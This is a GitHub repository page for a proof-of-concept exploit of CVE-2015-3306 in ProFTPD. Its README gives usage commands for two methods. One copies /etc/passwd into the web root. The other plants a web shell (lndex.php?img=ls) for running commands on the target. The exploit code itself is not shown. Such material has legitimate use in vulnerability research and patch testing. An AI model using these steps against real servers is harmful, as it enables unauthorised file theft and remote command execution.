Skip to content

shk0x/cpx_proftpd

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 

Repository files navigation

cpx_proftpd

PoC by Daniel Aldana for CVE-2015-3306 exploitation. Bug reported by Vadim Melihow.

###METHOD 1:

usage:

python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>

ex:

python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt

then try:

http://127.0.0.1/pass.txt

###METHOD 2:

usage:

python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>

ex:

python cpx_proftp.py 127.0.0.1 /var/www/html

then try:

http://127.0.0.1/lndex.php?img=ls

About

Tool for exploit CVE-2015-3306

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages